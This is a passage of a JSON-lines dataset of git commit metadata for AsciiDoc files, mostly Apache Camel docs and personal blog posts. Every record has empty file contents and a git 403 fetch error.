Gitbook\n","repos":"RohanHart\/camel,anton-k11\/camel,rmarting\/camel,JYBESSON\/camel,akhettar\/camel,JYBESSON\/camel,kevinearls\/camel,sverkera\/camel,pax95\/camel,nboukhed\/camel,nicolaferraro\/camel,neoramon\/camel,alvinkwekel\/camel,tlehoux\/camel,tadayosi\/camel,apache\/camel,RohanHart\/camel,sirlatrom\/camel,punkhorn\/camel-upstream,neoramon\/camel,jkorab\/camel,veithen\/camel,apache\/camel,ullgren\/camel,NickCis\/camel,sabre1041\/camel,sirlatrom\/camel,hqstevenson\/camel,jonmcewen\/camel,allancth\/camel,cunningt\/camel,tkopczynski\/camel,zregvart\/camel,bgaudaen\/camel,rmarting\/camel,rmarting\/camel,hqstevenson\/camel,lburgazzoli\/apache-camel,lburgazzoli\/camel,veithen\/camel,anoordover\/camel,yuruki\/camel,drsquidop\/camel,adessaigne\/camel,onders86\/camel,yuruki\/camel,CodeSmell\/camel,neoramon\/camel,onders86\/camel,anoordover\/camel,mcollovati\/camel,tkopczynski\/camel,yuruki\/camel,bhaveshdt\/camel,anton-k11\/camel,veithen\/camel,isavin\/camel,hqstevenson\/camel,ullgren\/camel,pmoerenhout\/camel,ssharma\/camel,onders86\/camel,sabre1041\/camel,chirino\/camel,akhettar\/camel,RohanHart\/camel,lburgazzoli\/apache-camel,sirlatrom\/camel,gautric\/camel,mgyongyosi\/camel,nicolaferraro\/camel,snurmine\/camel,dmvolod\/camel,snurmine\/camel,tlehoux\/camel,pkletsko\/camel,acartapanis\/camel,scranton\/camel,alvinkwekel\/camel,gautric\/camel,scranton\/camel,tadayosi\/camel,driseley\/camel,onders86\/camel,onders86\/camel,allancth\/camel,punkhorn\/camel-upstream,yuruki\/camel,tdiesler\/camel,tdiesler\/camel,ssharma\/camel,bgaudaen\/camel,Fabryprog\/camel,bgaudaen\/camel,jarst\/camel,bhaveshdt\/camel,prashant2402\/camel,sabre1041\/camel,prashant2402\/camel,salikjan\/camel,dmvolod\/camel,acartapanis\/camel,pkletsko\/camel,drsquidop\/camel,acartapanis\/camel,mgyongyosi\/camel,tdiesler\/camel,nicolaferraro\/camel,acartapanis\/camel,anton-k11\/camel,tlehoux\/camel,jarst\/camel,jamesnetherton\/camel,w4tson\/camel,anoordover\/camel,akhettar\/camel,jonmcewen\/camel,ullgren\/camel,rmarting\/camel,curso007\/camel,chirino\/camel,w4tson\/camel,cunningt\/camel,bgaudaen\/camel,driseley\/camel,christophd\/camel,nboukhed\/camel,davidkarlsen\/camel,davidkarlsen\/camel,DariusX\/camel,jamesnetherton\/camel,isavin\/camel,tadayosi\/camel,gnodet\/camel,pmoerenhout\/camel,davidkarlsen\/camel,gilfernandes\/camel,curso007\/camel,jamesnetherton\/camel,curso007\/camel,adessaigne\/camel,driseley\/camel,apache\/camel,davidkarlsen\/camel,kevinearls\/camel,mgyongyosi\/camel,bgaudaen\/camel,prashant2402\/camel,tdiesler\/camel,tkopczynski\/camel,chirino\/camel,jonmcewen\/camel,pax95\/camel,jarst\/camel,akhettar\/camel,adessaigne\/camel,akhettar\/camel,Thopap\/camel,sabre1041\/camel,alvinkwekel\/camel,sabre1041\/camel,jamesnetherton\/camel,adessaigne\/camel,yuruki\/camel,sabre1041\/camel,kevinearls\/camel,ssharma\/camel,NickCis\/camel,isavin\/camel,pkletsko\/camel,snurmine\/camel,dmvolod\/camel,jkorab\/camel,tadayosi\/camel,cunningt\/camel,CodeSmell\/camel,snurmine\/camel,NickCis\/camel,jonmcewen\/camel,sirlatrom\/camel,tdiesler\/camel,anoordover\/camel,ssharma\/camel,hqstevenson\/camel,snurmine\/camel,driseley\/camel,nikhilvibhav\/camel,pkletsko\/camel,tlehoux\/camel,sverkera\/camel,anton-k11\/camel,neoramon\/camel,lburgazzoli\/apache-camel,nboukhed\/camel,driseley\/camel,pax95\/camel,sverkera\/camel,lburgazzoli\/camel,mgyongyosi\/camel,lburgazzoli\/camel,jarst\/camel,hqstevenson\/camel,anton-k11\/camel,ssharma\/camel,allancth\/camel,veithen\/camel,isavin\/camel,lburgazzoli\/camel,kevinearls\/camel,jkorab\/camel,christophd\/camel,nikhilvibhav\/camel,curso007\/camel,akhettar\/camel,objectiser\/camel,JYBESSON\/camel,nikhilvibhav\/camel,chirino\/camel,Fabryprog\/camel,mcollovati\/camel,lburgazzoli\/apache-camel,gilfernandes\/camel,acartapanis\/camel,cunningt\/camel,christophd\/camel,CodeSmell\/camel,nboukhed\/camel,RohanHart\/camel,dmvolod\/camel,curso007\/camel,tkopczynski\/camel,veithen\/camel,RohanHart\/camel,salikjan\/camel,chirino\/camel,anoordover\/camel,gnodet\/camel,sirlatrom\/camel,gilfernandes\/camel,tlehoux\/camel,drsquidop\/camel,isavin\/camel,pax95\/camel,anoordover\/camel,NickCis\/camel,neoramon\/camel,DariusX\/camel,snurmine\/camel,tadayosi\/camel,zregvart\/camel,NickCis\/camel,pmoerenhout\/camel,jarst\/camel,bhaveshdt\/camel,w4tson\/camel,mcollovati\/camel,sverkera\/camel,prashant2402\/camel,punkhorn\/camel-upstream,kevinearls\/camel,sverkera\/camel,nboukhed\/camel,nboukhed\/camel,gilfernandes\/camel,DariusX\/camel,anton-k11\/camel,objectiser\/camel,mgyongyosi\/camel,RohanHart\/camel,apache\/camel,drsquidop\/camel,nicolaferraro\/camel,gautric\/camel,CodeSmell\/camel,jkorab\/camel,cunningt\/camel,gilfernandes\/camel,gautric\/camel,onders86\/camel,pmoerenhout\/camel,gautric\/camel,scranton\/camel,NickCis\/camel,kevinearls\/camel,jarst\/camel,hqstevenson\/camel,jonmcewen\/camel,mgyongyosi\/camel,cunningt\/camel,bgaudaen\/camel,scranton\/camel,gnodet\/camel,drsquidop\/camel,christophd\/camel,dmvolod\/camel,jkorab\/camel,tkopczynski\/camel,isavin\/camel,chirino\/camel,JYBESSON\/camel,lburgazzoli\/camel,tadayosi\/camel,Thopap\/camel,tkopczynski\/camel,nikhilvibhav\/camel,acartapanis\/camel,objectiser\/camel,sirlatrom\/camel,DariusX\/camel,jamesnetherton\/camel,punkhorn\/camel-upstream,bhaveshdt\/camel,veithen\/camel,bhaveshdt\/camel,w4tson\/camel,jkorab\/camel,driseley\/camel,alvinkwekel\/camel,pmoerenhout\/camel,w4tson\/camel,allancth\/camel,allancth\/camel,prashant2402\/camel,dmvolod\/camel,pmoerenhout\/camel,bhaveshdt\/camel,zregvart\/camel,JYBESSON\/camel,scranton\/camel,Thopap\/camel,christophd\/camel,Thopap\/camel,sverkera\/camel,adessaigne\/camel,neoramon\/camel,gnodet\/camel,lburgazzoli\/apache-camel,allancth\/camel,jamesnetherton\/camel,pax95\/camel,apache\/camel,rmarting\/camel,curso007\/camel,Fabryprog\/camel,tlehoux\/camel,pax95\/camel,Thopap\/camel,ullgren\/camel,lburgazzoli\/camel,pkletsko\/camel,mcollovati\/camel,apache\/camel,scranton\/camel,JYBESSON\/camel,gautric\/camel,pkletsko\/camel,rmarting\/camel,christophd\/camel,gilfernandes\/camel,Fabryprog\/camel,prashant2402\/camel,drsquidop\/camel,adessaigne\/camel,tdiesler\/camel,zregvart\/camel,jonmcewen\/camel,yuruki\/camel,w4tson\/camel,Thopap\/camel,gnodet\/camel,ssharma\/camel,lburgazzoli\/apache-camel,objectiser\/camel","old_file":"components\/camel-xmlrpc\/src\/main\/docs\/xmlrpc-dataformat.adoc","new_file":"components\/camel-xmlrpc\/src\/main\/docs\/xmlrpc-dataformat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4dd0772cfeedaf648f2bb15d13beae8e93ac1cf2","subject":"Publish 2099-1-1-Puzzle-2-Hack-Me-If-You-Can.adoc","message":"Publish 2099-1-1-Puzzle-2-Hack-Me-If-You-Can.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2099-1-1-Puzzle-2-Hack-Me-If-You-Can.adoc","new_file":"2099-1-1-Puzzle-2-Hack-Me-If-You-Can.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2227574e49380c212bcffe6d8e18ff84e1db4639","subject":"Update 2017-02-21.adoc","message":"Update 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-21.adoc","new_file":"_posts\/2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd5bae819d5f7ab350d5bc8fde0a86dd7e967c9d","subject":"y2b create post RIP Steve Jobs - Your message was clear.","message":"y2b create post RIP Steve Jobs - Your message was clear.","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-06-RIP-Steve-Jobs--Your-message-was-clear.adoc","new_file":"_posts\/2011-10-06-RIP-Steve-Jobs--Your-message-was-clear.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f4e43a21ae4b1d87274a3041404f8211281a265","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"719ea8fcfd5197573096c9fb038df34ad1745227","subject":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","message":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65c8d96a750866bfb460e99d5674660e9b94579a","subject":"Update 2015-09-30-Multithreading-and-Parallel-Programming.adoc","message":"Update 2015-09-30-Multithreading-and-Parallel-Programming.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-30-Multithreading-and-Parallel-Programming.adoc","new_file":"_posts\/2015-09-30-Multithreading-and-Parallel-Programming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0aea329e399b037d8d3951eb424837416c33ac26","subject":"y2b create post This Thing = Next Level Portable Gaming","message":"y2b create post This Thing = Next Level Portable Gaming","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-21-This-Thing--Next-Level-Portable-Gaming.adoc","new_file":"_posts\/2016-08-21-This-Thing--Next-Level-Portable-Gaming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9e2f5fbd3801d550b77c0ef16e120e3ab9ab3a3","subject":"Update 2015-11-06-Homens-Libertem-se.adoc","message":"Update 2015-11-06-Homens-Libertem-se.adoc","repos":"homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io","old_file":"_posts\/2015-11-06-Homens-Libertem-se.adoc","new_file":"_posts\/2015-11-06-Homens-Libertem-se.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/homenslibertemse\/homenslibertemse.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6974989e41a57ff556a703f8848a6fcb5df3709e","subject":"Delete the file at '_posts\/2017-06-01-Naming-Conventions.adoc'","message":"Delete the file at '_posts\/2017-06-01-Naming-Conventions.adoc'","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-06-01-Naming-Conventions.adoc","new_file":"_posts\/2017-06-01-Naming-Conventions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8208a2854da66d6798963e18fd226b9e131cd10c","subject":"Update 2017-10-03-new-blog-is-online.adoc","message":"Update 2017-10-03-new-blog-is-online.adoc","repos":"laibaogo\/hubpress.io,laibaogo\/hubpress.io,laibaogo\/hubpress.io,laibaogo\/hubpress.io","old_file":"_posts\/2017-10-03-new-blog-is-online.adoc","new_file":"_posts\/2017-10-03-new-blog-is-online.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/laibaogo\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0d7b09e12bf3f23f77fb3e421484cd9f47ce931","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92b811527f4e5298d6576bc4af373d94d61b40de","subject":"Much draft notes about Papyrus 5.2","message":"Much draft notes about Papyrus 5.2\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Automated Eclipse install.adoc","new_file":"Dev tools\/Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58eae680a77572fd9efdb65179cd46e35de48489","subject":"Update 2016-09-26-X-Eement-Save-6KB.adoc","message":"Update 2016-09-26-X-Eement-Save-6KB.adoc","repos":"aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io","old_file":"_posts\/2016-09-26-X-Eement-Save-6KB.adoc","new_file":"_posts\/2016-09-26-X-Eement-Save-6KB.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aspick\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18c0cd23f3fb837dde471e39aea9cb3953d7039b","subject":"Update 2017-10-08-Acemice-Belki-Hadsizce-9.adoc","message":"Update 2017-10-08-Acemice-Belki-Hadsizce-9.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-10-08-Acemice-Belki-Hadsizce-9.adoc","new_file":"_posts\/2017-10-08-Acemice-Belki-Hadsizce-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6444d951be3282c9a99e9e69360f16c837343a81","subject":"Update 2015-09-23-Daisies-arent-roses.adoc","message":"Update 2015-09-23-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-09-23-Daisies-arent-roses.adoc","new_file":"_posts\/2015-09-23-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66749ceddeecc7ec33a608b672a242fe45754c74","subject":"docs(apim): add upgrade guide for 3.18.10","message":"docs(apim): add upgrade guide for 3.18.10\n","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"pages\/apim\/3.x\/installation-guide\/upgrades\/3.18.10\/README.adoc","new_file":"pages\/apim\/3.x\/installation-guide\/upgrades\/3.18.10\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e665f933758af70576e3bda3e5b883afa8365b07","subject":"Update 2018-10-10-Python-A-W-S-Lambda.adoc","message":"Update 2018-10-10-Python-A-W-S-Lambda.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-10-Python-A-W-S-Lambda.adoc","new_file":"_posts\/2018-10-10-Python-A-W-S-Lambda.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99afea68e4a8fa50356aa31a5c618594db537eae","subject":"Update 2019-11-16-Thinking-About-Life.adoc","message":"Update 2019-11-16-Thinking-About-Life.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-11-16-Thinking-About-Life.adoc","new_file":"_posts\/2019-11-16-Thinking-About-Life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a2c3234617f1d8e53eabd8bdf95088a3c56faa3","subject":"tutorial: create reveal.js and arc42 from scratch","message":"tutorial: create reveal.js and arc42 from scratch\n","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/020_tutorial\/110_revealjs_and_arc42_from_scratch.adoc","new_file":"src\/docs\/020_tutorial\/110_revealjs_and_arc42_from_scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c823585bbe592d5f6b76da8096fb410fb9da7ee6","subject":"Added Endpoint completer to adoc","message":"Added Endpoint completer to adoc\n","repos":"pmoerenhout\/camel,apache\/camel,alvinkwekel\/camel,christophd\/camel,mcollovati\/camel,tadayosi\/camel,tdiesler\/camel,nicolaferraro\/camel,zregvart\/camel,nikhilvibhav\/camel,cunningt\/camel,Fabryprog\/camel,objectiser\/camel,tdiesler\/camel,tdiesler\/camel,christophd\/camel,cunningt\/camel,christophd\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,tadayosi\/camel,ullgren\/camel,pmoerenhout\/camel,apache\/camel,adessaigne\/camel,gnodet\/camel,objectiser\/camel,tdiesler\/camel,davidkarlsen\/camel,DariusX\/camel,gnodet\/camel,christophd\/camel,tadayosi\/camel,cunningt\/camel,alvinkwekel\/camel,gnodet\/camel,christophd\/camel,CodeSmell\/camel,CodeSmell\/camel,kevinearls\/camel,nikhilvibhav\/camel,pax95\/camel,pmoerenhout\/camel,DariusX\/camel,pax95\/camel,cunningt\/camel,tadayosi\/camel,objectiser\/camel,tadayosi\/camel,cunningt\/camel,davidkarlsen\/camel,DariusX\/camel,apache\/camel,davidkarlsen\/camel,adessaigne\/camel,gnodet\/camel,nicolaferraro\/camel,ullgren\/camel,kevinearls\/camel,davidkarlsen\/camel,nikhilvibhav\/camel,apache\/camel,ullgren\/camel,Fabryprog\/camel,punkhorn\/camel-upstream,apache\/camel,pmoerenhout\/camel,objectiser\/camel,mcollovati\/camel,mcollovati\/camel,kevinearls\/camel,tdiesler\/camel,DariusX\/camel,zregvart\/camel,nicolaferraro\/camel,tadayosi\/camel,cunningt\/camel,zregvart\/camel,apache\/camel,Fabryprog\/camel,ullgren\/camel,gnodet\/camel,adessaigne\/camel,kevinearls\/camel,adessaigne\/camel,alvinkwekel\/camel,punkhorn\/camel-upstream,tdiesler\/camel,kevinearls\/camel,alvinkwekel\/camel,adessaigne\/camel,pax95\/camel,zregvart\/camel,kevinearls\/camel,pmoerenhout\/camel,pmoerenhout\/camel,pax95\/camel,nicolaferraro\/camel,christophd\/camel,CodeSmell\/camel,Fabryprog\/camel,nikhilvibhav\/camel,mcollovati\/camel,pax95\/camel,pax95\/camel,adessaigne\/camel,punkhorn\/camel-upstream","old_file":"docs\/user-manual\/en\/endpoint-completer.adoc","new_file":"docs\/user-manual\/en\/endpoint-completer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0e4c5a4ed3ce15393d6e90df8d74af151636f02a","subject":"Update 2016-08-26-guidelines-with-google-apps-script.adoc","message":"Update 2016-08-26-guidelines-with-google-apps-script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-26-guidelines-with-google-apps-script.adoc","new_file":"_posts\/2016-08-26-guidelines-with-google-apps-script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1bab0a27eb7fc573440e130c0eb68ce060dabbed","subject":"Update 2016-08-26-guidelines-with-google-apps-script.adoc","message":"Update 2016-08-26-guidelines-with-google-apps-script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-26-guidelines-with-google-apps-script.adoc","new_file":"_posts\/2016-08-26-guidelines-with-google-apps-script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59f02a84dbc168a786a395c99bf0014ba4b57e29","subject":"Update 2015-05-18-uGUI.adoc","message":"Update 2015-05-18-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-18-uGUI.adoc","new_file":"_posts\/2015-05-18-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a3e2deda66169830485e0c503c969132cd6ad12","subject":"Update 2015-10-31-toto.adoc","message":"Update 2015-10-31-toto.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2015-10-31-toto.adoc","new_file":"_posts\/2015-10-31-toto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4156604399da14f6e7ec2980c0f8336c13d306b","subject":"Update 2018-05-24-fear.adoc","message":"Update 2018-05-24-fear.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-05-24-fear.adoc","new_file":"_posts\/2018-05-24-fear.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3aa989269a8f1c66e7c4910543896ffe87a4cd43","subject":"Update 2017-01-13-vue.adoc","message":"Update 2017-01-13-vue.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-vue.adoc","new_file":"_posts\/2017-01-13-vue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6caa8b63062349cabefa5cb6eec25630ea313efb","subject":"Update 2016-06-28-First-post.adoc","message":"Update 2016-06-28-First-post.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-06-28-First-post.adoc","new_file":"_posts\/2016-06-28-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd1fc25f3dfdafc4fbf8814369a93d821a2c44cb","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8e5b90eaae6b41beaa2155857f71b576877ebb8","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a0eaf426cca7180a21093e5a06b0f38935ce8552","subject":"Update 2015-07-17-How-Seque-Works.adoc","message":"Update 2015-07-17-How-Seque-Works.adoc","repos":"skeate\/skeate.github.io,skeate\/skeate.github.io,skeate\/skeate.github.io,skeate\/skeate.github.io","old_file":"_posts\/2015-07-17-How-Seque-Works.adoc","new_file":"_posts\/2015-07-17-How-Seque-Works.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skeate\/skeate.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b53f6b231dcfa6895a8eea4befeae6f25c428a8","subject":"Update 2016-04-14-Un-poco-sobre-nmap.adoc","message":"Update 2016-04-14-Un-poco-sobre-nmap.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-14-Un-poco-sobre-nmap.adoc","new_file":"_posts\/2016-04-14-Un-poco-sobre-nmap.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6006e12ba3fcd7744abecceec1276fddd3abbf32","subject":"add Dutch Clojure Day 2017","message":"add Dutch Clojure Day 2017\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2017\/dutchclojureday.adoc","new_file":"content\/events\/2017\/dutchclojureday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} 